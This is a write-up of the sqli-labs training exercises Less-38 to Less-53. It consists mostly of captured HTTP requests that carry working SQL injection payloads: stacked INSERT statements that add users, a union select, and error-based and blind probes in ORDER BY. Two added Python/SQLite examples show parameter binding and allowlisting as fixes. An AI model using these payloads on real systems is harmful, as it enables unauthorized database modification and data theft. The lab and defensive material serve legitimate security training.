Less-38 stacked Query
GET /Less-38/?id=-1%27%20union%20select%201,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
The goal of this level is to stack multiple SQL statements in a single injection.
GET /Less-38/?id=-1';INSERT INTO `security`.`users` (`username`, `password`) VALUES ('1234', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-39 stacked Query Integer type
GET /Less-39/?id=-1;INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-39', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-40 stacked Query String type Blind
GET /Less-40/?id=1');INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-40', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-41 stacked Query Integer type blind
GET /Less-41/?id=1;INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-41', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-42 - Stacked Query error based
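- In the source code the password field is not filtered, so it is injectable; the error output is then used to locate the injection point.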
POST /Less-42/login.php HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-42/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
login_user=&login_password=';INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-42', '5678');--+&mysubmit=Login
Less-43 - Stacked Query
POST /Less-43/login.php HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 131
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-42/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
login_user=&login_password=');INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-43', '5678');--+&mysubmit=Login
Less-44 - Stacked Query blind
Blind injection: no error messages are returned.
POST /Less-44/login.php HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 134
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-44/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
login_user=Dumb&login_password=';INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-44', '5678');--+&mysubmit=Login
Less-45 - Stacked Query Blind based twist
Blind injection: no error messages are returned.
POST /Less-45/login.php HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 135
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-44/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
login_user=Dumb&login_password=');INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-45', '5678');--+&mysubmit=Login
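Added example (not from the original post or from sqli-labs): a Python/SQLite stand-in for the pattern behind Less-38 to Less-45, showing a concatenated query run through a multi-statement API next to a bound-parameter version. The table layout, the query shape and the function names are assumptions; SQLite replaces the lab's MySQL so the block runs offline.

```python
import sqlite3

# Payload shape from the Less-38 request above, without the `security`. qualifier
# (SQLite has no such schema here); trailing space replaces the URL-encoded '+'.
PAYLOAD = "-1';INSERT INTO users (username, password) VALUES ('1234', '5678');-- "

def make_db():
    """In-memory stand-in for the lab's users table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('Dumb', 'Dumb')")
    db.commit()
    return db

def user_count(db):
    return db.execute("SELECT COUNT(*) FROM users").fetchone()[0]

def lookup_vulnerable(db, user_id):
    """Concatenation + multi-statement API: every ';'-separated statement runs."""
    # Assumed query shape; the page does not show the lab's source.
    db.executescript("SELECT * FROM users WHERE id='" + user_id + "' LIMIT 0,1")

def lookup_single_statement(db, user_id):
    """Concatenation kept, single-statement API: the stacked INSERT is refused,
    but the input still alters the SELECT, so this alone is not a fix."""
    try:
        db.execute("SELECT * FROM users WHERE id='" + user_id + "' LIMIT 0,1")
        return "executed"
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return "refused"

def lookup_hardened(db, user_id):
    """Bound parameter + single-statement API: the input is only ever a value."""
    cur = db.execute("SELECT username FROM users WHERE id = ? LIMIT 1", (user_id,))
    return cur.fetchone()

if __name__ == "__main__":
    db = make_db()
    lookup_vulnerable(db, PAYLOAD)
    print("rows after vulnerable lookup:", user_count(db))
    db = make_db()
    print("hardened lookup result:", lookup_hardened(db, PAYLOAD))
    print("single-statement API:", lookup_single_statement(db, PAYLOAD))
    print("rows after hardened lookups:", user_count(db))
```

The same two controls apply to the login forms in Less-42 to Less-45: bind `login_password` as a value and use an API call that executes one statement only.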
Less-46 ORDER BY-Error-Numeric
Picked an arbitrary table, built a SELECT statement around it to trigger an error, then tested this injection point with sqlmap.
GET /Less-46/?sort=(select count(*) from information_schema.INNODB_SYS_TABLES where updatexml(1,concat('^',(select database()),'^'),1)) HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-47 ORDER BY Clause-Error-Single quote
GET /Less-47/?sort=1' and (select count(*) from information_schema.INNODB_SYS_TABLES where updatexml(1,concat('^',(select database()),'^'),1))--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-48 ORDER BY Clause Blind based
Based on the statement sqlmap produced earlier, the result is verified with a boolean condition.
GET /Less-48/?sort='1',(SELECT (CASE WHEN (length(database())=8) THEN 1 ELSE 9523*(SELECT 9523 FROM INFORMATION_SCHEMA.PLUGINS) END))--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-49 ORDER BY Clause Blind based
GET /Less-49/?sort=1',(SELECT (CASE WHEN (length(database())=8) THEN 1 ELSE 9523*(SELECT 9523 FROM INFORMATION_SCHEMA.PLUGINS) END))--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-50 ORDER BY Clause Blind based
GET /Less-50/?sort=1;INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-50', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-51 ORDER BY Clause Blind based
GET /Less-51/?sort=1';INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-51', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-52 ORDER BY Clause Blind based
GET /Less-52/?sort=1;INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-52', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
Less-53 ORDER BY Clause Blind based
GET /Less-53/?sort=1';INSERT INTO `security`.`users` (`username`, `password`) VALUES ('Less-53', '5678');--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/index-2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close
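Added example (not from the original post or from sqli-labs): for the `sort` parameter used in Less-46 to Less-53, a column name cannot be supplied as a bound value, so the request value is mapped through an allowlist to fixed identifiers. Python/SQLite stand-in; the table contents, the allowlist keys, the `direction` argument and the function names are assumptions.

```python
import sqlite3

# Request value -> fixed identifier. Only these strings ever reach the query text.
SORT_COLUMNS = {"1": "id", "2": "username", "3": "password",
                "id": "id", "username": "username", "password": "password"}

def make_db():
    """In-memory stand-in for the lab's users table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("Dumb", "x"), ("Angelina", "y"), ("Dummy", "z")])
    return db

def list_users(db, sort, direction="asc"):
    """Allowlisted ORDER BY: unknown sort keys are rejected before any SQL is built."""
    column = SORT_COLUMNS.get(sort)
    if column is None:
        raise ValueError("unsupported sort key")
    # direction is a hypothetical second parameter; it collapses to two literals.
    order = "DESC" if direction.lower() == "desc" else "ASC"
    rows = db.execute(f"SELECT username FROM users ORDER BY {column} {order}")
    return [r[0] for r in rows]

def list_users_bound(db, sort):
    """Binding the sort key is injection-safe but does not sort by a column:
    the placeholder is a constant value, not a column reference."""
    rows = db.execute("SELECT username FROM users ORDER BY ?", (sort,))
    return [r[0] for r in rows]

if __name__ == "__main__":
    db = make_db()
    print(list_users(db, "username"))
    print(list_users(db, "1", "desc"))
    try:
        list_users(db, "1;INSERT INTO users (username, password) VALUES ('Less-50', '5678');-- ")
    except ValueError as exc:
        print("rejected:", exc)
```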
Last updated 2022-06-27 17:06